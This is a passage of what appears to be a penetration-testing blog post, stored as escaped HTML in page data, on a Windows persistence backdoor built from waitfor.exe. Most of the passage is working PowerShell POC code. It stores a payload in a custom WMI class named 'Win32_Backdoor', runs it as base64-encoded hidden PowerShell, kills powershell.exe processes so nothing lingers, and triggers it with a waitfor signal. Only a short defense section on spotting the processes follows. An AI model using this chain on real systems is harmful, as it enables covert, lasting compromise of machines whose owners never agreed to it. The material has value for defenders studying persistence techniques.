named 1.ps1 on the target system\u003C\u002Fp>\u003Cp>The content of 1.ps1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>start-process calc.exe\u003Cbr>cmd \u002Fc waitfor persist &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The escape character &amp; in PowerShell must be represented as `&amp;\u003C\u002Fp>\u003Cp>\u003Cstrong>Enable waiting mode:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor persist1 &amp;&amp; powershell -executionpolicy bypass -file c:\\test\\1.ps1\u003C\u002Fp>\u003Cp>\u003Cstrong>Send signal:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>cmd:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist1\u003C\u002Fp>\u003Ch3>Approach 2:\u003C\u002Fh3>\u003Cp>Do not save files on the target system\u003C\u002Fp>\u003Cp>Here we use a technique previously introduced in 'WMI backdoor' to store the payload in a WMI class for reading and usage\u003C\u002Fp>\u003Cp>Store payload:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Read payload:\u003C\u002Fp>\u003Cp>([WmiClass] 'Win32_Backdoor').Properties['Code'].Value\u003C\u002Fp>\u003Cp>The above operations are shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018792403_3_2a4e2fc515-1.jpeg\">\u003C\u002Fp>\u003Cp>Execute payload:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using Invoke-Expression to execute commands is also possible; using iex is to shorten the length\u003C\u002Fp>\u003Cp>Combined with the parameter format of waitfor, here we choose to encode the code as base64\u003C\u002Fp>\u003Cp>Base64 encode the code for executing the payload, the following code is saved in code.txt:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Base64 encode it, the code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$code = Get-Content -Path code.txt\u003Cbr>$bytes = [System.Text.Encoding]::UNICODE.GetBytes($code);\u003Cbr>$encoded = [System.Convert]::ToBase64String($bytes)\u003Cbr>$encoded\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The base64 encrypted code is as follows:\u003C\u002Fp>\u003Cp>JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>The above operation is shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018803371_4_ebfc3b1ba6-1.jpeg\">\u003C\u002Fp>\u003Cp>Testing base64 encrypted code:\u003C\u002Fp>\u003Cp>powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\u003C\u002Fp>\u003Cp>Code executed successfully, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018809918_5_f934d86d60-1.jpeg\">\u003C\u002Fp>\u003Cp>Based on the above approach, the POC is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() \u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>There are two layers of escape characters\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>`` is used to represent `\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Installation code:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Actual test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018815834_6_eec2f052c8-1.jpeg\">\u003C\u002Fp>\u003Cp>There is a bug causing powershell.exe to fail to exit properly, leaving the process lingering in the background\u003C\u002Fp>\u003Cp>Therefore, a piece of code needs to be added to terminate the process powershell.exe\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Based on the logical relationship, the code to terminate powershell.exe should be written before powershell -nop -W Hidden -E ...\u003C\u002Fp>\u003Cp>Finally, the complete POC code is as follows:\u003C\u002Fp>\u003Cp>Backdoor code:\u003C\u002Fp>\u003Cp>(Administrator privileges)\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$StaticClass = New-Object Management.ManagementClass('root\\cimv2', $null,$null)\u003Cbr>$StaticClass.Name = 'Win32_Backdoor'\u003Cbr>$StaticClass.Put()| Out-Null\u003Cbr>$StaticClass.Properties.Add('Code' , \"cmd \u002Fc start calc.exe ```&amp;```&amp; taskkill \u002Ff \u002Fim powershell.exe ```&amp;```&amp; waitfor persist ```&amp;```&amp; powershell -nop -W Hidden -E JABlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQAZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACAAJABlAHgAZQBjAA==\")\u003Cbr>$StaticClass.Put() | Out-Null\u003Cbr>\u003Cbr>$exec=([WmiClass] 'Win32_Backdoor').Properties['Code'].Value;\u003Cbr>iex $exec | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Activation command:\u003C\u002Fp>\u003Cp>waitfor \u002Fs 127.0.0.1 \u002Fsi persist\u003C\u002Fp>\u003Cp>Complete demonstration as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018822287_7_3405375de8-1.png\">\u003C\u002Fp>\u003Cp>No residual process issues exist\u003C\u002Fp>\u003Ch2>0x05 Defense\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Pay attention to the background process waitfor.exe\u003C\u002Fp>\u003Cp>For suspicious background processes cmd.exe and powershell.exe, you can use Process Explorer to view their startup parameters, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018827167_8_45b3c689da-1.jpeg\">\u003C\u002Fp>\u003Cp>You can also read the historical echo content from the above processes. Reference materials are as follows:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fjblog.javelin-networks.com\u002Fblog\u002Fcli-powershell\u002F\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the implementation approach of the Waitfor.exe backdoor, and there may be more exploitation techniques\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1430,"Onedaysec",6,"published","2026-02-02T08:06:59.473Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Waitfor.exe Backdoor Exploitation: Persistence & POC Details","waitfor.exe, persistence, backdoor, PowerShell, penetration testing, POC, exploitation, Windows, command line, signal synchronization",null,false,[],{"docs":43,"hasNextPage":40},[44,4,45,46],283,281,280,{"title":39,"description":39,"image":39},"2026-07-24T15:37:14.387Z","2026-07-23T16:01:19.124Z","draft","2026-07-23T16:05:02.597Z"]